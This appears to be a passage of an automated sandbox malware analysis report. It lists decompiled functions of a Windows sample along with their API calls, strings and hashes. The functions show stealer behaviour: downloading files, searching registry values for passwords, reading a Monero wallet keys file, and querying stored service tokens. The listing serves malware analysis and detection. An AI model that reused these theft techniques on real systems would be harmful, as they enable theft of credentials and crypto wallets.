                              Function 001C60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                              • InternetOpenA.WININET(001E0DF7,00000001,00000000,00000000,00000000), ref: 001C610F
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001C618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001C61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001C61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 001C6249
                              • InternetCloseHandle.WININET(?), ref: 001C6253
                              • InternetCloseHandle.WININET(00000000), ref: 001C6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                              • Instruction ID: f7bb18dd6ad4da4483ae7db160bab8219b40b6e7bcd9f6cbd505d300e665de7f
                              • Opcode Fuzzy Hash: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                              • Instruction Fuzzy Hash: 86516EB1900218ABDB20DF90DD45FEE77B8EF54701F1080A8A605A7180DB74AA85CF99
                              Function 001C72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                              • HeapFree.KERNEL32(00000000), ref: 001C7459
                              • task.LIBCPMTD ref: 001C7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                              • Instruction ID: 1d8d2ea39a9085014b83ecbf02f6b577c8face05f7648f10d8425b6f276a5ee8
                              • Opcode Fuzzy Hash: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                              • Instruction Fuzzy Hash: 6B611EB59142589BDB24DB50CC95FDAB7B8BF64300F0081E9E689A6181DFB09FC9CF91
                              Function 001CBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              • lstrlen.KERNEL32(00000000), ref: 001CBC9F
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 001CBCCD
                              • lstrlen.KERNEL32(00000000), ref: 001CBDA5
                              • lstrlen.KERNEL32(00000000), ref: 001CBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                              • Instruction ID: d909545cdd75544b749e00abdb7bb243a16dea49dbfcec92b9c42b72b5f73d7b
                              • Opcode Fuzzy Hash: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                              • Instruction Fuzzy Hash: 18B15571910158ABDF04FBA0CD96EEE7338AF64301F804569F506B3291EF346E49DBA6
                              Function 001D6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                              • Instruction ID: f3d1579eb177c81c0adeaff34cb6aaccbe709001630ba7782be5a8375e53862b
                              • Opcode Fuzzy Hash: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                              • Instruction Fuzzy Hash: 57F05E31904309EFD344AFE4EA0976C7B70FB04703F1481A9E609A72D1D6708B61AB9A
                              Function 001C4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001C4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C4FD1
                              • InternetOpenA.WININET(001E0DDF,00000000,00000000,00000000,00000000), ref: 001C4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 001C5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 001C5041
                              • InternetCloseHandle.WININET(?), ref: 001C50B9
                              • InternetCloseHandle.WININET(?), ref: 001C50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 23b0c7d37f88da88a159ced5f02a3e35f90893060c97c2047eeda0dba7cf57c7
                              • Instruction ID: 35cadf408c72b27d95c0e9c6838af5ff896f89d608b2a18a94f3acdbef3ed787
                              • Opcode Fuzzy Hash: 23b0c7d37f88da88a159ced5f02a3e35f90893060c97c2047eeda0dba7cf57c7
                              • Instruction Fuzzy Hash: 283107B4A40218ABDB20CF54CD85BDCB7B4EB48704F5081E9FA09B7281C770AAD58F99
                              Function 001D8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,014AE248,00000000,?,001E0E2C,00000000,?,00000000), ref: 001D8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001D8158
                              • wsprintfA.USER32 ref: 001D81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                              • Instruction ID: 5a04cefcc117879435696b5368a088aff9f5374cf944092c52156367cf6930c6
                              • Opcode Fuzzy Hash: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                              • Instruction Fuzzy Hash: 88214AB1E44318ABDB04DFD4DD49FAEB7B8FB44B00F10461AF605BB280C77869058BA9
                              Function 001D83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                              • wsprintfA.USER32 ref: 001D8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,014AE188,00000000,000F003F,?,00000400), ref: 001D84EC
                              • lstrlen.KERNEL32(?), ref: 001D8501
                              • RegQueryValueExA.ADVAPI32(00000000,014AE428,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001E0B34), ref: 001D8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                              • Instruction ID: 644812412495ec1b8ee9654cc7ee1b682ac3ca6b5807784dbf730adb53137d5a
                              • Opcode Fuzzy Hash: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                              • Instruction Fuzzy Hash: FE21FA7191022CABDB24DB54DD85FE9B3B8FB48714F00C5E9E609A6240DF71AA85CFD4
                              Function 001D7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0149C0B8,00000000,00020119,00000000), ref: 001D76DD
                              • RegQueryValueExA.ADVAPI32(00000000,014AE380,00000000,00000000,?,000000FF), ref: 001D76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                              • Instruction ID: 800dc35e8be4a57a678a3c17a0700132c38095da6ed6e6e8b8c66492a4a47d54
                              • Opcode Fuzzy Hash: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                              • Instruction Fuzzy Hash: A80162B5A04304BBE700EBE4DE4DF6EB7B8EB48701F108465FA04E72D1E77099148B55
                              Function 001D7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0149C0B8,00000000,00020119,001D76B9), ref: 001D775B
                              • RegQueryValueExA.ADVAPI32(001D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001D777A
                              • RegCloseKey.ADVAPI32(001D76B9), ref: 001D7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                              • Instruction ID: db1956f9125e57dbbefbccf63524a48afe470104e509e3a18180207ad3c7a605
                              • Opcode Fuzzy Hash: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                              • Instruction Fuzzy Hash: CD0167B5A40308BBD700EBE4DD49FAEB7B8EB48704F008565FA05B7281D77095508B55
                              Function 001C99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                              • LocalFree.KERNEL32(001C148F), ref: 001C9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
